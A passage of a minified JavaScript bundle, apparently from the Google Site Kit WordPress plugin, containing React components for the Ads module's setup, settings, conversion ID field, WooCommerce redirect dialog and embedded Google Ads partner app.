text","google-site-kit")),G===S&&(e=(0,g._x)("(disabled)","screen reader text","google-site-kit")),e?i?`${i} ${e}`:"string"==typeof c?`${c} ${e}`:void 0:i}();let U=L,W=P;return r&&(U=(0,j.jsx)(f,{width:14,height:14})),y&&!h&&(W=(0,j.jsx)(M.A,{width:14,height:14})),s&&!x&&(W=(0,j.jsx)(u,{width:14,height:14})),s&&x&&(W=(0,j.jsx)(I,{width:14,height:14})),(0,j.jsxs)(z,{"aria-label":Z,className:n()("googlesitekit-cta-link",d,{"googlesitekit-cta-link--secondary":o,"googlesitekit-cta-link--inverse":x,"googlesitekit-cta-link--small":w,"googlesitekit-cta-link--caps":a,"googlesitekit-cta-link--danger":p,"googlesitekit-cta-link--disabled":m,"googlesitekit-cta-link--standalone":_,"googlesitekit-cta-link--link-button":E,"googlesitekit-cta-link--no-flex":!!D}),disabled:m,href:G!==N&&G!==b||m?void 0:C,onClick:T,rel:G===b?"noopener noreferrer":void 0,ref:t,target:G===b?"_blank":void 0,to:R,...O,children:[!!U&&(0,j.jsx)(k.A,{marginRight:5,children:U}),(0,j.jsx)("span",{className:"googlesitekit-cta-link__contents",children:c}),!!W&&(0,j.jsx)(k.A,{marginLeft:5,children:W})]})});C.propTypes={arrow:a().bool,back:a().bool,caps:a().bool,children:a().node,className:a().string,danger:a().bool,disabled:a().bool,external:a().bool,hideExternalIndicator:a().bool,href:a().string,inverse:a().bool,leadingIcon:a().node,linkButton:a().bool,noFlex:a().bool,onClick:a().func,small:a().bool,standalone:a().bool,to:a().string,trailingIcon:a().node};const x=C},41671:(e,t,i)=>{i.d(t,{A:()=>l});var o=i(62688),s=i.n(o),n=i(82871),r=i(38432),a=i(97015);const LearnMoreLink=({className:e,external:t=!0,href:i,label:o=(0,n.__)("Learn more","google-site-kit"),onClick:s=()=>{}})=>i?a.createElement(r.A,{href:i,className:e,onClick:s,external:t},o):null;LearnMoreLink.propTypes={href:s().string.isRequired,className:s().string,label:s().string,external:s().bool,onClick:s().func};const l=LearnMoreLink},42343:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,s=i(63696);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},n.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",n({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),o||(o=s.createElement("path",{fill:"currentColor",d:"m5.825 22 2.325-7.6L2 10h7.6L12 2l2.4 8H22l-6.15 4.4 2.325 7.6L12 17.3z"})))},43127:(e,t,i)=>{var o,s,n=i(50539),r=i.n(n),a=i(13620),l=i.n(a),c=i(88176),g=i.n(c),d=i(46935),u=i.n(d),p=i(82871),m=i(82286),I=i(63696);function y(){return y=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},y.apply(null,arguments)}const h=e=>I.createElement("svg",y({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 40 40"},e),o||(o=I.createElement("g",{clipPath:"url(#ads_svg__a)"},I.createElement("path",{fill:"#3C8BD9",d:"M13.612 5.602c.386-1.015.918-1.95 1.707-2.706C18.478-.181 23.697.592 25.84 4.458c1.61 2.932 3.318 5.8 4.978 8.7 2.77 4.816 5.573 9.632 8.312 14.465 2.303 4.044-.193 9.15-4.768 9.843-2.803.419-5.43-.87-6.88-3.383-2.432-4.237-4.88-8.473-7.313-12.694a1.5 1.5 0 0 0-.177-.258c-.258-.21-.37-.515-.531-.79-1.08-1.9-2.191-3.785-3.27-5.67-.693-1.224-1.418-2.432-2.11-3.656a6.67 6.67 0 0 1-.887-3.544c.048-.645.129-1.29.419-1.87"}),I.createElement("path",{fill:"#FABC04",d:"M13.612 5.602c-.145.58-.274 1.16-.306 1.772-.048 1.353.29 2.61.966 3.786 1.772 3.044 3.544 6.105 5.3 9.166.161.274.29.547.451.805a805 805 0 0 1-2.915 5.01c-1.354 2.336-2.707 4.688-4.076 7.024-.064 0-.08-.032-.097-.08-.016-.13.033-.242.065-.371.66-2.417.113-4.56-1.547-6.396-1.015-1.111-2.303-1.74-3.785-1.949-1.933-.274-3.641.226-5.171 1.434-.274.21-.451.515-.774.677-.064 0-.096-.033-.112-.081.773-1.337 1.53-2.674 2.303-4.011 3.19-5.542 6.38-11.083 9.585-16.609.032-.064.08-.113.113-.177"}),I.createElement("path",{fill:"#34A852",d:"M1.675 26.447c.306-.274.596-.564.918-.821 3.915-3.093 9.795-.854 10.648 4.043.21 1.176.097 2.304-.257 3.431a2 2 0 0 1-.065.274c-.145.258-.274.532-.435.79-1.434 2.368-3.544 3.544-6.315 3.366C2.996 37.305.5 34.92.064 31.763c-.21-1.53.097-2.964.886-4.285.161-.29.354-.548.532-.838.08-.064.048-.193.193-.193"}),I.createElement("path",{fill:"#FABC04",d:"M1.675 26.447c-.064.065-.064.177-.177.194-.016-.113.048-.178.113-.258z"}),I.createElement("path",{fill:"#E1C025",d:"M12.92 33.374c-.065-.113 0-.193.064-.274l.064.065z"}))),s||(s=I.createElement("defs",null,I.createElement("clipPath",{id:"ads_svg__a"},I.createElement("path",{fill:"#fff",d:"M0 0h40v40H0z"})))));var f=i(4452),M=i.n(f);const k="modules/ads",j="https://www.googleapis.com/auth/adwords",v="wc-redirect-modal",S="woocommerce",b="google-listings-and-ads",N=[S,b];var A=i(29785),C=i(97345),x=i(50464),D=i(62688),T=i.n(D),w=i(13606),_=i(85097),E=i(68761),R=i(76984),L=i(62051),P=i(32600),O=i(62540);const G="ecee-notification-ads";function EnhancedConversionsNotification({id:e,Notification:t}){const i=(0,n.useSelect)(e=>e(A.O4).getDocumentationLinkURL("enhanced-conversions-ads"));return(0,O.jsx)(t,{children:(0,O.jsx)(P.A,{notificationID:e,type:R.Q.INFO_ALT,title:(0,p.__)("Boost your data and Ads results with enhanced conversions","google-site-kit"),description:(0,w.A)((0,p.__)("Site Kit now supports enhanced conversions. This feature helps your ads count sales and leads more accurately, even across different devices, so your budget is spent smarter. To turn this on, simply agree to the terms of service in your Ads account and enable enhanced conversions. <a />","google-site-kit"),{a:(0,O.jsx)(L.A,{id:e,label:(0,p.__)("Learn more","google-site-kit"),url:i})}),dismissButton:{label:(0,p.__)("No thanks","google-site-kit")},ctaButton:{label:(0,p.__)("Go to Ads","google-site-kit"),href:"https://ads.google.com/aw/conversions/customersettings",dismissOnClick:!0,external:!0,hideExternalIndicator:!0}})})}EnhancedConversionsNotification.propTypes={id:T().string.isRequired,Notification:T().elementType.isRequired};var z=i(25797);function EnhancedConversionsSettingsNotice({type:e=z.A.TYPES.INFO}){const t=G,i=(0,_.W)(),o=(0,E.A)(t),[s,r]=(0,I.useState)(!1),a=(0,n.useSelect)(e=>e(A.O4).getDocumentationLinkURL("enhanced-conversions-ads")),l=(0,n.useSelect)(e=>e(C.oR).isItemDismissed(t)),{dismissItem:c}=(0,n.useDispatch)(C.oR),g=(0,I.useCallback)(async()=>{await c(t),o.confirm()},[c,t,o]),d=(0,I.useCallback)(async()=>{await c(t),o.dismiss()},[c,t,o]);return(0,I.useEffect)(()=>{!s&&i&&(o.view(),r(!0))},[i,o,s]),l?null:(0,O.jsx)(z.A,{type:e,title:(0,p.__)("Boost your data and Ads results with enhanced conversions","google-site-kit"),description:(0,w.A)((0,p.__)("Site Kit now supports enhanced conversions. This feature helps your ads count sales and leads more accurately, even across different devices, so your budget is spent smarter. To turn this on, simply agree to the terms of service in your Ads account and enable enhanced conversions. <a />","google-site-kit"),{a:(0,O.jsx)(L.A,{id:t,label:(0,p.__)("Learn more","google-site-kit"),url:a})}),dismissButton:{label:(0,p.__)("No thanks","google-site-kit"),onClick:d},ctaButton:{label:(0,p.__)("Go to Ads","google-site-kit"),href:"https://ads.google.com/aw/conversions/customersettings",onClick:g,external:!0,hideExternalIndicator:!0}})}EnhancedConversionsSettingsNotice.propTypes={type:T().oneOf(Object.values(z.A.TYPES))};var Z=i(23955),U=i(30805),W=i(98117),B=i(33052);function SettingsView(){const e=(0,U.i)("adsPax"),t=(0,U.i)("googleTagGateway"),i=(0,U.i)("gtagUserData"),o=(0,n.useSelect)(e=>e(k).getConversionID()),s=(0,n.useSelect)(e=>e(k).getPaxConversionID()),r=(0,n.useSelect)(e=>e(k).getExtCustomerID()),a=(0,n.useSelect)(e=>e(C.oR).isAdBlockerActive()),l=e&&s?s:o,c=e&&(s||r),g=(0,n.useSelect)(e=>e(A.O4).isConversionTrackingEnabled()),d=(0,n.useSelect)(e=>{if(!t)return!1;const{isGoogleTagGatewayEnabled:i,isGTGHealthy:o,isScriptAccessEnabled:s}=e(A.O4);return i()&&o()&&s()});return(0,O.jsxs)("div",{className:"googlesitekit-setup-module",children:[(0,O.jsx)("div",{className:M()({"googlesitekit-settings-module__meta-item":a}),children:(0,O.jsx)(Z.A,{moduleSlug:"ads"})}),!a&&(0,O.jsxs)(I.Fragment,{children:[(0,O.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,O.jsx)(B.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,p.__)("Conversion ID","google-site-kit")}),(0,O.jsxs)("p",{className:"googlesitekit-settings-module__meta-item-data",children:[""===l&&(0,p.__)("None","google-site-kit"),l||void 0===l&&(0,O.jsx)(x.A,{value:l})]})]}),c&&(0,O.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,O.jsx)(B.A,{as:"h5",size:"medium",type:"body",className:"googlesitekit-settings-module__meta-item-type",children:(0,p.__)("Customer ID","google-site-kit")}),(0,O.jsxs)("p",{className:"googlesitekit-settings-module__meta-item-data",children:[""===r&&(0,p.__)("None","google-site-kit"),r||void 0===r&&(0,O.jsx)(x.A,{value:r})]})]})]}),(0,O.jsx)(W.A,{statuses:[{label:(0,p.__)("Plugin conversion tracking","google-site-kit"),status:g},...t?[{label:(0,p.__)("Google tag gateway for advertisers","google-site-kit"),status:d}]:[]]}),i&&(0,O.jsx)(EnhancedConversionsSettingsNotice,{})]})}var H=i(60854),Y=i(78014),Q=i(7076),F=i(49383),V=i(55989),J=i(30979),X=i(3170);function ConversionIDTextField({helperText:e,hideHeading:t=!1}){const i=(0,n.useSelect)(e=>e(k).getConversionID()),[o,s]=(0,I.useState)(!i||(0,J.EL)(i)),r=(0,Q.d)(s,500),{setConversionID:a}=(0,n.useDispatch)(k),l=(0,I.useCallback)(({currentTarget:e})=>{let t=e.value.trim().toUpperCase();""===t||/^AW-/.test(t)||(t=`AW-${t}`),t!==i&&a(t),r((0,J.EL)(t))},[r,i,a]);return(0,O.jsxs)("div",{className:"googlesitekit-settings-module__fields-group",children:[!t&&(0,O.jsx)(B.A,{as:"h4",size:"small",type:"title",className:"googlesitekit-settings-module__fields-group-title",children:(0,p.__)("Conversion ID","google-site-kit")}),e&&(0,O.jsx)("p",{className:"googlesitekit-settings-module__fields-group-helper-text",children:e}),(0,O.jsx)(F.TextField,{label:(0,p.__)("Conversion ID","google-site-kit"),className:M()("googlesitekit-text-field-conversion-tracking-id",{"mdc-text-field--error":!o}),helperText:!o&&(0,p.__)("Tracking for your Ads campaigns won’t work until you insert a valid ID","google-site-kit"),leadingIcon:(0,O.jsx)("span",{className:"googlesitekit-text-field-conversion-tracking-id-prefix",children:"AW-"}),trailingIcon:!o&&(0,O.jsxs)("span",{className:"googlesitekit-text-field-icon--error",children:[(0,O.jsx)(V.A,{children:(0,p.__)("Error","google-site-kit")}),(0,O.jsx)(X.A,{width:14,height:12})]}),value:i?.replace(/^(AW)?-?/,""),onChange:l,maxLength:20,outlined:!0})]})}var K=i(40960),q=i(52684),$=i(4751),ee=i(12317),te=i(80),ie=i(32091),oe=i.n(ie),se=i(17243);const ne="pax",re=1,ae=2,le="pax_setup_success_notification";var ce=i(50532),ge=i.n(ce),de=i(90187),ue=i(54419),pe=i(6109);function me(e){const t=(0,pe.XH)(e);return{year:t.getFullYear(),month:t.getMonth()+1,day:t.getDate()}}function Ie(e,t={}){const{onCampaignCreated:i=null,onFinishAndCloseSignUpFlow:o=null}=t,{select:s,resolveSelect:n}=e,r=function(){const e=ge()(()=>(0,ue.set)("core","user","get-token")),t=(0,se.debounce)(e.clear,3e4,{leading:!1,trailing:!0,maxWait:24e4});function i(){return t(),e()}return i.clear=()=>{t.cancel(),e.clear()},i}();async function a(){return await n(k).getModuleData(),s(k).getSupportedConversionEvents()||[]}return{authenticationService:{get:async()=>({accessToken:(await r()).token}),fix:async()=>(r.clear(),{retryReady:!0})},businessService:{getBusinessInfo:async()=>{await n(A.O4).getSiteInfo();return{businessName:s(A.O4).getSiteName(),businessUrl:s(A.O4).getHomeURL()}},fixBusinessInfo:async()=>({retryReady:!0})},campaignService:{notifyNewCampaignCreated:async()=>(i&&await i(),{})},conversionTrackingService:{getSupportedConversionLabels:async()=>({conversionLabels:await a()}),getPageViewConversionSetting:async()=>({websitePages:await async function(){try{return(await(0,de.default)({path:"/wp/v2/pages?per_page=100"})).map(e=>({title:e.title.rendered,path:new URL(e.link).pathname}))}catch{return[]}}()}),getSupportedConversionTrackingTypes:async()=>{const e=["TYPE_PAGE_VIEW"];return(await a()).length>0&&e.push("TYPE_CONVERSION_EVENT"),{conversionTrackingTypes:e}}},termsAndConditionsService:{notify:async()=>({})},partnerDateRangeService:{get:async()=>{const{startDate:t,endDate:i}=e.select(C.oR).getDateRangeDates({offsetDays:0});return{startDate:me(t),endDate:me(i)}}},userActionService:{finishAndCloseSignUpFlow:async()=>(o&&await o(),{})}}}function PAXEmbeddedApp({displayMode:e="default",onLaunch:t,onCampaignCreated:o,onFinishAndCloseSignUpFlow:s}){const[r,a]=(0,I.useState)("function"==typeof i.g?.google?.ads?.integration?.integrator?.launchGoogleAds),[l,c]=(0,I.useState)(!1),[g,d]=(0,I.useState)(!0),[u,m]=(0,I.useState)(void 0),y=(0,n.useSelect)(t=>"reporting"!==e?{}:t(C.oR).getDateRangeDates({offsetDays:te.f2})),h=(0,n.useSelect)(e=>e(C.oR).isAdBlockerActive()),f=`googlesitekit-pax-embedded-app-${(0,q.A)(PAXEmbeddedApp,"PAXEmbeddedApp")}`,M=(0,I.useRef)(),k=(0,I.useCallback)(()=>{"reporting"===e&&M?.current&&y.startDate&&y.endDate&&M.current.getServices().adsDateRangeService.update({startDate:me(y.startDate),endDate:me(y.endDate)})},[e,y.endDate,y.startDate]),j=(0,n.useRegistry)(),v=(0,I.useCallback)(async()=>{if(l)return;c(!0);const n=function(e={}){const{contentContainer:t,reportingStyle:o,_global:s=i.g}=e,n=s?._googlesitekitPAXConfig;return oe()((0,se.isPlainObject)(n),"base PAX config must be a plain object"),(0,se.merge)(n,t?{clientConfig:{partnerName:"site-kit",contentContainer:t}}:{},o?{contentConfig:{partnerAdsExperienceConfig:{reportingStyle:o}}}:{})}({contentContainer:`#${f}`,reportingStyle:"reporting"===e?"REPORTING_STYLE_MINI":"REPORTING_STYLE_FULL"}),r=Ie(j,{onCampaignCreated:o,onFinishAndCloseSignUpFlow:s});try{M.current=await i.g.google.ads.integration.integrator.launchGoogleAds(n,r),k(),t?.(M.current)}catch(e){m(e),i.g.console.error("Google Ads Partner Experience Error:",e)}d(!1)},[e,f,l,o,s,t,j,k]);return(0,K.A)(()=>{r||l||"function"==typeof i.g?.google?.ads?.integration?.integrator?.launchGoogleAds&&a(!0)},l?null:50),(0,I.useEffect)(()=>{r&&!l&&v()},[l,g,r,v]),(0,I.useEffect)(()=>{k()},[k,y.startDate,y.endDate]),(0,O.jsxs)("div",{className:"googlesitekit-pax-embedded-app",children:[!!u&&!h&&(0,O.jsx)(ee.A,{title:(0,p.__)("Google Ads error","google-site-kit"),description:(0,p.__)("Could not load Google Ads content.","google-site-kit"),error:!0}),g&&(0,O.jsx)($.A,{width:"100%",height:"240px"}),(0,O.jsx)("div",{id:f})]})}PAXEmbeddedApp.propTypes={displayMode:T().oneOf(["default","reporting","setup"]),onLaunch:T().func,onCampaignCreated:T().func,onFinishAndCloseSignUpFlow:T().func};var ye,he=i(51568),fe=i(81597),Me=i(70301),ke=i(8732);function je(){return je=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},je.apply(null,arguments)}const ve=e=>I.createElement("svg",je({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 109 46"},e),ye||(ye=I.createElement("path",{fill:"#873EFF",fillRule:"evenodd",d:"M45.718 8.472c-2.54 0-4.194.827-5.67 3.603l-6.734 12.7V13.491c0-3.367-1.595-5.02-4.549-5.02-2.953 0-4.193 1.004-5.67 3.839l-6.38 12.463V13.611c0-3.604-1.476-5.14-5.079-5.14H4.312C1.536 8.472 0 9.772 0 12.135s1.477 3.78 4.194 3.78h3.012V30.15c0 4.017 2.717 6.38 6.616 6.38s5.67-1.536 7.62-5.14l4.252-7.973v6.733c0 3.958 2.599 6.38 6.556 6.38 3.958 0 5.435-1.36 7.679-5.14l9.805-16.538c2.127-3.603.65-6.38-4.076-6.38zM64.147 8.472c-8.033 0-14.117 5.965-14.117 14.058s6.143 13.998 14.117 13.998 14.058-5.965 14.117-13.998c0-8.093-6.143-14.058-14.117-14.058m0 19.433c-3.012 0-5.08-2.245-5.08-5.376 0-3.13 2.068-5.434 5.08-5.434s5.08 2.304 5.08 5.435-2.008 5.375-5.08 5.375M94.329 8.472c-7.974 0-14.117 5.965-14.117 14.058s6.143 13.998 14.117 13.998 14.117-5.965 14.117-13.998c0-8.034-6.143-14.058-14.117-14.058m0 19.433c-3.072 0-5.02-2.245-5.02-5.376 0-3.13 2.007-5.434 5.02-5.434s5.08 2.304 5.08 5.435-2.009 5.375-5.08 5.375",clipRule:"evenodd"})));var Se=i(83366),be=i(65929),Ne=i(62659),Ae=i(83880);function WooCommerceRedirectModal({dialogActive:e,onClose:t,onDismiss:i=null,onContinue:o=null,onBeforeSetupCallback:s=null}){const[r,a]=(0,I.useState)(""),l=(0,Ne.A)(),c=(0,n.useSelect)(e=>e(A.O4).getAdminURL()),g=(0,n.useSelect)(e=>e(k).isWooCommerceActivated()),d=(0,n.useSelect)(e=>e(k).isGoogleForWooCommerceActivated()),u=d?"gfw":"wc";(0,I.useEffect)(()=>{e&&(0,pe.sx)(`${l}_pax_wc-redirect`,"view_modal",u)},[e,l,u]);const m=(0,n.useSelect)(e=>{const t=e(k).hasGoogleForWooCommerceAdsAccount();return!!(g&&d&&t)}),y=(0,n.useSelect)(e=>e(k).isWooCommerceRedirectModalDismissed()),h=(0,n.useSelect)(e=>e(C.oR).isItemDismissed("account-linked-via-google-for-woocommerce")),f=(0,I.useMemo)(()=>{if(!c||!g)return;if(!1===d)return(0,he.F)(`${c}/plugin-install.php`,{s:b,tab:"search",type:"term"});const e=encodeURIComponent("/google/dashboard");return`${c}/admin.php?page=wc-admin&path=${e}`},[c,g,d]),{navigateTo:j}=(0,n.useDispatch)(Me.M),{dismissNotification:v}=(0,n.useDispatch)(ke.D),S=(0,I.useCallback)(async()=>{h||v("account-linked-via-google-for-woocommerce"),await(0,pe.sx)(`${l}_pax_wc-redirect`,"choose_gfw",u),m&&(a("primary"),j(f)),i?.(),t?.()},[h,v,a,i,t,j,f,l,u,m]),N=(0,be.A)(fe.I),x=(0,I.useCallback)(()=>{if((0,pe.sx)(`${l}_pax_wc-redirect`,"choose_sk",u),o||(a("tertiary"),i?.()),o)return t(),void o();s?.(),N()},[a,i,t,s,N,o,l,u]);return y&&!r?null:(0,O.jsxs)(F.Dialog,{className:M()("googlesitekit-dialog-woocommerce-redirect",{"googlesitekit-dialog-woocommerce-redirect--ads-connected":m}),open:e,"aria-describedby":void 0,tabIndex:"-1",onClose:t,children:[(0,O.jsx)("div",{className:"googlesitekit-dialog-woocommerce-redirect__svg-wrapper",children:(0,O.jsx)(ve,{width:110,height:46})}),(0,O.jsx)(F.DialogTitle,{children:m?(0,p.__)("Are you sure you want to create another Ads account for this site?","google-site-kit"):(0,p.__)("Using the WooCommerce plugin?","google-site-kit")}),(0,O.jsx)(F.DialogContent,{children:(0,O.jsx)(Ae.A,{children:m?(0,O.jsxs)(I.Fragment,{children:[(0,p.__)("Site Kit has detected an already existing Ads account connected to this site via the Google for WooCommerce extension.","google-site-kit"),(0,O.jsx)("br",{}),(0,p.__)("Continue Ads setup with Site Kit only if you do want to create another account.","google-site-kit")]}):(0,p.__)("The Google for WooCommerce plugin can utilize your provided business information for advertising on Google and may be more suitable for your business.","google-site-kit")})}),(0,O.jsxs)(F.DialogFooter,{children:[(0,O.jsx)(F.Button,{className:"mdc-dialog__cancel-button",onClick:x,icon:"tertiary"===r?(0,O.jsx)(F.CircularProgress,{size:14}):void 0,disabled:!!r,tertiary:!0,children:m?(0,p.__)("Create another account","google-site-kit"):(0,p.__)("Continue with Site Kit","google-site-kit")}),(0,O.jsx)(F.Button,{trailingIcon:m?void 0:(0,O.jsx)(Se.A,{width:13,height:13}),icon:"primary"===r?(0,O.jsx)(F.CircularProgress,{size:14}):void 0,onClick:()=>{m||g?S():t()},href:m?null:f,target:m?"_self":"_blank",disabled:!!r,tertiary:!m,children:m?(0,p.__)("View current Ads account","google-site-kit"):(0,p.__)("Use Google for WooCommerce","google-site-kit")})]})]})}WooCommerceRedirectModal.propTypes={dialogActive:T().bool.isRequired,onDismiss:T().func,onClose:T().func,onContinue:T().func,onBeforeSetupCallback:T().func};var Ce=i(38432),xe=i(61736),De=i(35403);function SettingsForm(){const e=(0,U.i)("adsPax"),t=(0,U.i)("googleTagGateway"),i=(0,U.i)("gtagUserData"),o=(0,n.useSelect)(e=>e(k).getConversionID()),s=(0,n.useSelect)(e=>e(k).getPaxConversionID()),r=(0,n.useSelect)(e=>e(k).getExtCustomerID()),a=(0,n.useSelect)(e=>e(A.O4).getDocumentationLinkURL("plugin-conversion-tracking")),l=e&&s?s:o,c=e&&(s||r);return(0,O.jsxs)("div",{className:"googlesitekit-ads-settings-fields",children:[(0,O.jsx)(Y.A,{moduleSlug:"ads",storeName:k}),!c&&(0,O.jsx)("div",{className:"googlesitekit-setup-module__inputs",children:(0,O.jsx)(ConversionIDTextField,{helperText:(0,p.__)("The Conversion ID will help track the performance of ad campaigns for the corresponding account","google-site-kit")})}),c&&(0,O.jsxs)("div",{children:[(0,O.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,O.jsx)(B.A,{as:"h5",size:"small",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,p.__)("Conversion ID","google-site-kit")}),(0,O.jsxs)("p",{className:"googlesitekit-settings-module__meta-item-data",children:[""===l&&(0,p.__)("None","google-site-kit"),l||void 0===l&&(0,O.jsx)(x.A,{value:l})]})]}),(0,O.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,O.jsx)(B.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,p.__)("Customer ID","google-site-kit")}),(0,O.jsxs)("p",{className:"googlesitekit-settings-module__meta-item-data",children:[""===r&&(0,p.__)("None","google-site-kit"),r||void 0===r&&(0,O.jsx)(x.A,{value:r})]})]})]}),(0,O.jsxs)(xe.A,{title:(0,p.__)("Improve your measurement","google-site-kit"),children:[(0,O.jsx)(H.A,{children:(0,w.A)((0,p.__)("To track the performance of your campaigns, Site Kit will enable plugin conversion tracking. <a>Learn more</a>","google-site-kit"),{a:(0,O.jsx)(Ce.A,{href:a,"aria-label":(0,p.__)("Learn more about conversion tracking","google-site-kit"),external:!0})})}),t&&(0,O.jsx)(De.A,{}),i&&(0,O.jsx)(EnhancedConversionsSettingsNotice,{type:R.Q.INFO_ALT})]})]})}function SettingsEdit(){const e=(0,n.useSelect)(e=>e(k).isDoingSubmitChanges());let t;return t=(0,n.useSelect)(e=>e(C.oR).isAdBlockerActive())?(0,O.jsx)(Z.A,{moduleSlug:"ads"}):e?(0,O.jsx)(F.ProgressBar,{}):(0,O.jsx)(SettingsForm,{}),(0,O.jsx)("div",{className:"googlesitekit-setup-module googlesitekit-setup-module--ads",children:t})}var Te=i(88273);function SettingsDisconnectNote(){const e=(0,n.useSelect)(e=>e(Te.i).getDetailsLinkURL(fe.I)),t=(0,n.useSelect)(e=>e(k).getPaxConversionID()),i=(0,n.useSelect)(e=>e(k).getExtCustomerID());return e&&(t||i)?(0,w.A)((0,p.__)("<strong>Note:</strong> Disconnecting Ads from Site Kit won’t remove your campaign from Ads. <br />Visit <DetailsLink /> to manage your campaign settings","google-site-kit"),{strong:(0,O.jsx)("strong",{}),br:(0,O.jsx)("br",{}),DetailsLink:(0,O.jsx)(Ce.A,{href:e,external:!0,hideExternalIndicator:!0,children:(0,p._x)("Ads","Service name","google-site-kit")})}):null}var we=i(35410);function SetupForm({finishSetup:e,createAccountCTA:t,isNavigatingToOAuthURL:i}){const o=(0,n.useSelect)(e=>e(k).canSubmitChanges()),s=(0,n.useSelect)(e=>e(k).isDoingSubmitChanges()&&!i),{submitChanges:r}=(0,n.useDispatch)(k),{setConversionTrackingEnabled:a,saveConversionTrackingSettings:l}=(0,n.useDispatch)(A.O4),c=(0,I.useCallback)(async t=>{t.preventDefault();const{error:i}=await r();i||(a(!0),await l(),e())},[e,l,a,r]);return(0,O.jsxs)("form",{className:"googlesitekit-ads-setup__form",onSubmit:c,children:[(0,O.jsx)(Y.A,{moduleSlug:"ads",storeName:k}),(0,O.jsx)("div",{className:"googlesitekit-setup-module__inputs",children:(0,O.jsx)(ConversionIDTextField,{})}),t&&(0,O.jsx)("div",{className:"googlesitekit-setup-module__create-account",children:t}),(0,O.jsx)(we.A,{className:"googlesitekit-margin-top-1",message:(0,p.__)("To track the performance of your campaigns, Site Kit will enable plugin conversion tracking. You can always disable it in settings.","google-site-kit")}),(0,O.jsx)("div",{className:"googlesitekit-setup-module__action",children:(0,O.jsx)(F.SpinnerButton,{disabled:!o||s,isSaving:s,children:(0,p.__)("Complete setup","google-site-kit")})})]})}function SetupFormPAX({finishSetup:e,isNavigatingToOAuthURL:t}){const i=(0,n.useSelect)(e=>e(k).canSubmitChanges()),o=(0,n.useSelect)(e=>e(k).isDoingSubmitChanges()&&!t),{submitChanges:s}=(0,n.useDispatch)(k),{setConversionTrackingEnabled:r,saveConversionTrackingSettings:a}=(0,n.useDispatch)(A.O4),l=(0,n.useSelect)(e=>e(k).getConversionID()),c=(0,n.useSelect)(e=>e(k).getGoogleForWooCommerceConversionID()),g=!!l&&l===c,d=(0,I.useCallback)(async t=>{t.preventDefault();const{error:i}=await s();i||(r(!0),await a(),e())},[e,a,r,s]);return(0,O.jsxs)("div",{className:"googlesitekit-ads-setup__form googlesitekit-ads-setup__form--pax",children:[(0,O.jsx)(Y.A,{moduleSlug:"ads",storeName:k}),(0,O.jsx)("div",{className:"googlesitekit-setup-module__inputs",children:(0,O.jsx)(ConversionIDTextField,{hideHeading:!0})}),g&&(0,O.jsx)(z.A,{className:"googlesitekit-notice--small googlesitekit-ads-setup__ads-id-conflict-warning",type:z.A.TYPES.WARNING,description:(0,p.__)("This Conversion ID is already in use via the Google for WooCommerce plugin. We don’t recommend adding it in Site Kit, as it may result in inaccurate measurement of your Ads campaign conversions.","google-site-kit"),hideIcon:!0}),(0,O.jsx)("div",{className:"googlesitekit-setup-module__action",children:(0,O.jsx)(F.SpinnerButton,{disabled:!i||o||g,isSaving:o,onClick:d,children:(0,p.__)("Complete manual setup","google-site-kit")})})]})}SetupForm.propTypes={finishSetup:T().func,createAccountCTA:T().node,isNavigatingToOAuthURL:T().bool},SetupForm.defaultProps={finishSetup:()=>{},createAccountCTA:null,isNavigatingToOAuthURL:!1},SetupFormPAX.propTypes={finishSetup:T().func,isNavigatingToOAuthURL:T().bool};var _e=i(55103);function SetupMain({finishSetup:e}){const t=(0,n.useSelect)(e=>e(C.oR).isAdBlockerActive());return(0,O.jsxs)("div",{className:"googlesitekit-setup-module googlesitekit-setup-module--ads",children:[(0,O.jsxs)("div",{className:"googlesitekit-setup-module__step",children:[(0,O.jsx)("div",{className:"googlesitekit-setup-module__logo",children:(0,O.jsx)(h,{width:"40",height:"40"})}),(0,O.jsx)(B.A,{as:"h3",className:"googlesitekit-setup-module__title",size:"small",type:"headline",children:(0,p._x)("Ads","Service name","google-site-kit")})]}),(0,O.jsxs)("div",{className:"googlesitekit-setup-module__step",children:[(0,O.jsx)(Z.A,{moduleSlug:"ads"}),!t&&(0,O.jsxs)(I.Fragment,{children:[(0,O.jsxs)(Ae.A,{children:[(0,w.A)((0,p.__)("Add your conversion ID below. Site Kit will place it on your site so you can track the performance of your Google Ads campaigns. <a>Learn more</a>","google-site-kit"),{a:(0,O.jsx)(_e.A,{path:"/google-ads/thread/108976144/where-i-can-find-google-conversion-id-begins-with-aw",external:!0})}),(0,O.jsx)("br",{}),(0,p.__)("You can always change this later in Site Kit Settings.","google-site-kit")]}),(0,O.jsx)(SetupForm,{finishSetup:e})]})]})]})}SetupMain.propTypes={finishSetup:T().func},SetupMain.defaultProps={finishSetup:()=>{}};var Ee=i(18117),Re=i(15844),Le=i(37467),Pe=i(10740);function SetupMainPAX({finishSetup:e}){const[t,o]=(0,I.useState)(!1),[s,r]=(0,Le.A)("pax"),a=!!s&&parseInt(s,10),l=(0,I.useRef)(),c=(0,Ne.A)(),g=(0,n.useSelect)(e=>e(C.oR).isAdBlockerActive()),d=(0,n.useSelect)(e=>e(C.oR).hasScope(j)),u=(0,n.useSelect)(e=>{const t=(0,he.F)(i.g.location.href,{[ne]:re});return 